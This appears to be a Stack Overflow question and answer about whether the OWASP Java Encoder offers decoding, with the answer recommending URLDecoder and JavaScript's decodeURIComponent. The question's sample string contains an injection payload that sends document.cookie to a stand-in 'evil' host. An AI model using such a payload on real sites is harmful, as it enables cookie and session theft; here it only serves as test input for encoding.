# Does the OWASP Java Encoder have any decoding functions?

Tags: javascript, java, url-encoding, owasp

I encoded the query string below with the `forURIComponent` method of the OWASP encoder.

```java
String query = "query=hello'};
window.location = 'http://evil?'+document.cookie;va&r- b = {//]'";

String encodedQuery = Encode.forUriComponent(query);
```

Now I need to decode `encodedQuery`, and the decoded string should be exactly equal to the original query.  How can I do this?

Answer (score 0):

I assume you're talking about the [OWASP Java Encoder](https://github.com/OWASP/owasp-java-encoder/).  As far as I can tell, it does not supply any decoding functions.

However, since the `Encode.forUriComponent()` method implements standard [URL percent encoding](https://en.wikipedia.org/wiki/Percent-encoding), you can use any correctly implemented URL decoding function to decode it.  For example in Java, according to [the answers to this question](https://stackoverflow.com/questions/2632175/decoding-uri-query-string-in-java), you could use [`java.net.URLDecoder`](https://docs.oracle.com/javase/7/docs/api/java/net/URLDecoder.html).

In JavaScript, [`decodeURIComponent()`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/decodeURIComponent) should do the trick.  If you need to parse a URI containing (possibly) multiple parameters, however, you may find the [`URL`](https://developer.mozilla.org/en-US/docs/Web/API/URL) class (or [`URLSearchParams`](https://developer.mozilla.org/en-US/docs/Web/API/URLSearchParams)) more convenient to use.